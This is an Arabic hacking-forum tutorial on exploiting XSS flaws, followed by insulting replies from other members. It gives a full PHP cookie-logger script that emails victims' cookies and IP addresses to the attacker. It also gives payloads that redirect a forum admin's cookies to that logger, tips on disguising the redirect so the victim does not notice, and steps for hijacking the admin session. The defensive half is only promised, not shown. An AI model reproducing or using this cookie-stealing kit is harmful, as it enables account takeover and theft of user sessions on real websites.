أإأختــرأإأقـ -_- أإأختــرأإأقـ الجزء الاول

[°·.·° KUWAITY ¤ M5RBHA °·.·°]

الشرح المفصل لاكتشاف ثغرات ال xss و تطبيقها و الحماية منها

السلام عليكم ورحمة الله تعالى وبركاته
اقدم لكم هذا الدرس كهدية مني لكل من يريد احتراف الاختراق و سلوك درب المعلمين الكبار
و هو اهداء خاص لكم
1- ماهي ثغرات ال xss :
اولا و قبل كل شيئ يجب معرفة ان هذا النوع من الثغرات يختلف عن الانواع الاخرى مثل sql و rfi
او الريموت فايل انكلود و ذلك في انها لا تطبق على الموقع او السيرفر بل تطبق على الاشخاص ...
فيجب على الضحية المساهمة لانجاح هذه الثغرة و ذلك بالذهاب الى الصفحة الملغمة التي تقوم بسرقة
معلومات مهمة من الكوكيز الخاص بالضحية .
فهي تسمح لك بتنفيذ أكواد الجافا سكربت وال HTML في متصفح الضحيه.
2- كيف تحدث ثغرات ال xss :
اغلب الثغرات سببها خطاء برمجي.. فهذه تنشاء بسبب خطاء برمجي سببه وضع فورم ادخال : كمربع
بحث او مربع وضع الردود في المنتديات .... الخ من فورمات الادخال ولكن الخطاء هو ان هذا الفورم
هو انه يعرض النتائج من غير تشفيرها .
ساشرح ذلك بمثال :
لدينا خطاء في هذا السكربت

كود PHP:

<?
$k = $_GET[M5RBHA];
echo $k ;
?>

فهو كما شرحنا سابقا ياخذ قيمة M-5RBHA يخزنها ب k و ذلك بواسطة الامر GET
ثم يقوم بعرضها على المتصفح بواسطة الامر echo
و لتطبيق العمل على هذ السكربت يجب عليكم تثبيب سيرفر خاص
تركيب سيرفر خاص
نقصد بتركيب سيرفر خاص تحويل جهازك الشخصي الى موقع استضافه تستطيع من خلاله تجربة برامجك و سكربتاتك
قبل و ضعها على الانترنت .. و تركيب السيرفر امر في غاية السهولة وماعليك الا اتباع هذه الخطوات :
- تحميل برنامج سيرفر في جهازك وليكن PHPTriad 2.0 المجاني والذي انا استعمله و افضله على البرامج الاخرى
- ثبثه بصورة عادية و ليكن التثبيث مثلا في الC
- الان و بعد التثبيث بنجاح ما عليك الا الدخول الى ال C ثم الى المجلد apache لتجد الايقونة التي بالصورة

-و عند الضغط على ايقونة الاباتشي يبدأ السيرفر المحلي او الخاص بالعمل و تستطيعون التاكد من ذلك بعد
ان تاتيكم الصورة التالية ...

- و هي تعني ان السيرفر يعمل بشكل سليم
انا الان لن افصل في استخدام ال php لان له استخدام واسع جدا في برمجة ال php ;ال قواعد البيانات من نوع
sql و تستطيعون البحث عن كتاب تعرف على الphp و ال sql الذي هو من تاليف صقر بن محمد العنزي .
كما قلنا بعد تشغيل السيرفر نستيطيع وضع سكربتنا في مجلد htdocs حيث نحرره باستخدم الnote bloc
مثلا و نحفظه باسم prog.php كالتالي :

فنجده هنا

- و لفتح سكربتنا نضع في المتصفح ما يلي :

كود PHP:

http://127.0.0.1/prog.php 


كما في الصورة
لا تندهش عندما لا يخرج لك شيء لان سكربتنا لا يعرض اي شئ

الان جاء وقت تنيفيذ ثغرتنا .. اولا هاهو السكربت

كود PHP:

<?
$k = $_GET[M5RBHA];
echo $k ;
?>

تامل جيدا المتغير M5RBHA لانه مسبوق بعلامة $ هذا هو سر الثغرة حيث القيمة المعطاة له يتم وضعها
بالمتغير k و الذي تتطم طباعته ... اذا ماذا لو غيلانا قيمة M5RBHA كالتالي ...
نقوم بوضع في متصفحنا ما يلي :

كود PHP:

http://127.0.0.1/prog.php?k9999=hello 


حيث حددنا قيمه للمتغير M5RBHA و التي هي عبارة عن نص hello
سيكون الناتج مايلي لاحظ الصورة جيدا

:

سنرى أننا جعلنا الطباعه من دون أي تشفير أي يستقبل من ثم يطبع من دون أن يشفر النتائج
الان ماذا لو ادخلنا نص بلغة الhtml
نص يقوم بتغير الكتابة الى bold و الكتابة الثخينة كما يلي

:

كود PHP:

http://127.0.0.1/prog.php?k9999=<b>hello</b> 


نلاحظ اننا نجحنا بذلك
ماذا لو اردنا وضع رابط :

كود PHP:

http://127.0.0.1/prog.php?k9999=<a%20href=www.site.com>hello</a> 


لكن ماذا لو جربنا اكواد الجافا سكريبت ...
سنجرب كود يقوم بعرض رسالة بها رقم هذه السنة 2008

كود PHP:

http://127.0.0.1/prog.php?k9999=<script>alert(2008);</script> 


الان

ما علينا الا وضع سكربت يعرض الكوكيز كهذا السكربت الذي اقول لكم انه لن يعرض شئ
لان سكربنتا لا يقوم بوضع ****** لكن العملية تنجح في المواقع او المنتديات المصابة
حيث اغلبها تقوم بوضوع ******s في جهازك لتسهيل عملية التصفح
و سكربت عرض الكوكيز تبعنا هو

كود PHP:

http://127.0.0.1/prog.php?k9999=<script>alert(********.c-o-o-k-i-e)</script> 


قم بنزع "-" بين كلمة كوكي
لو كان السكربت مطورا لوظع كوكيز لكانت النتيجة كالتالي

و

تلاحظ اننا طبقنا الثغرة على انفسنا و عرضنا الكوكيز الخاص بنا
لكننا كمخترقين ماذا نستفيد من هذه العملية
اقول لكم ماذا لو حصلنا على كوكيز الادمن مثلا لمنتدي القراصنة العرب مثلا
اذا حصل احدنا على هذا الكوكيز يستطيع الدخول على انه الادمن و يغير بمنتدانا هذا كما شاء
اذا فهي ثغرة خطيرة جدا ...
كيفية استغلال ثغرات الxss :
تتم الاستفادة من هذه الثغرة كالتالي :
- سوف نربط الكود باللوج
لكن ماهو اللوج log
اللوج هو ايضا سكربت مكتوب بلغة php و تضعه في موقعك الخاص مثلا في المواقع التي تسمح باستضافة المواقع
مجانا مثل

كود PHP:

www.membres.lycos.fr 


وغيرها من المواقع .
وهذا لوج :

كود PHP:

<?php
/* by  :_/\_: xp10 :_/\_: v1.0 *** k-9999 ***
/**************************************/
/******** قم بتغير معلواتك من أسفل هذا الخط **********/
/************************************/
$YourMail = "k--9999@hotmail.com"; // <== Your E-mail
/*-----------------------*/
if(isset($_GET['index'])){
$****** = $_GET['index'];
$redirect = "http://www.google.com"; # <== Edit
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
echo '<script>********.location="'.$redirect.'"</script>';
}
else print '
<title> k-9999 </title>
<body bgcolor="000000">
<center>
<b><font color="white">404</font></b><br>
<img src="http://www.google.com/"></center>
';
//**************************************//
//******** لاتقم بتغيررر أي شي من أسفل هذا الخط ********//
//************************************//
$Msg =
"
hi Mr hacker  ,,, www.xp10.com >>
[ ".$ip." ] = أي بي الضحيه
[ ".$date." ]= وقت دخول ضحيتك
[ hotmail-******s < By k-9999 >]
-----------------------------------------------
:: هذا كوكيز أحد ضحاياك ياهكر ::
".$******."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail," New-******",$******,$Msg);
/*****************************************************************************/
if($Send){
if($redirect <> ""){header("location:".$redirect);}
}
?>

اشكر اخي العزيز 00-devil لبرمجته هذا اللوج ---
ما عليك الا حفظه بعد تتغير الايمايل الى ايمايلك ووضعه بموقعك تحت اسم log.php
و ربط السكربت الذي ياتي بالكوكيز مع اللوج يكون كالتالي

كود PHP:

<Script>location.href="http://www.xxxxx.com/log.php?id="+********.******</Script> 


--- حيث :
www.xxxxx.com موقعك الخاص او المجاني الذي و ضعت به ملف الكوكيز .
لكن اذا اردت سرقة كلمة مرور المدير لمنتدى abc وهو منتدي وهمي طبعا *للشرح فقط*
الذي وجدت بمنتداه ثغرة xss كالتالي :

كود PHP:

www.abc.com/vb/forums/index.php?act=<script>alert(********.c-o-o-k-i-e)</script> 


وو ضعت له الرابط :

كود PHP:

www.abc.com/vb/forums/index.php?act=<Script>location.href="http://www.xxxxx.com/log.php?id="+********.******</Script> 


سياخذه مباشره الى صفحة اللوج حقك !!!!!
لذا يجب علينا تفادي هذه المشكلة وذلك بربطه بموقع للتمويه www.google.com
لكن انا اقول عند التنفيد خلي موقع التمويه يكون صفحة من صفحات او قسم من اقسام المنتدىىآ ..
حتي لا ينكشف امرنا :-)

كود PHP:

www.abc.com/vb/forums/index.php?act=<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+********.******</Script> 


حين يضغط المدير على اللنك ياخذه المتصفح الى صفحة google و ذلك بعد ان ينسخ الكوكيز تبعه ويحفظه في اللوج
تبعك و بهذا ادخل الى اللوج او الى الايمايل و ستجد معلومات الكوكيز تبع المدير .
قم بنسخها في الكوكيز الخاص بك طبعا كعضو في منتدي abc بطريقة يدوية او باستعمال برامج مثل
برنامج ****** editor
او تقوم مباشرة بفك كلمة السر المشفره التي تجدها بالكوكي
ومبروك عليك .
انتظروا كيفية الحماية من هذه الثغرة بالجزء الثاني انشاء الله

[ملــ الجن ــك]

السلام عليكم ورحمة الله وبركاته


ما بقي غيرك يا وجه العنز تحكي بالإختراق

طيب بقولك بحولك ما تبي من دينارات لو خبرتني شئ واحد

ما هو المعني الكامل لهالكلمة


xss


هذه انت كاتبها بأول الموضوع وهي اختصار لعدة كلمات

قول وش هي



يا نتل


تحياتي يا نتل يا صوت العنز

[ملــ الجن ــك]

وهذه بعد


بالكوكي



هذه اختصار للكوكيز

تقدر تقوللي وش بيكون الكوكيز هذا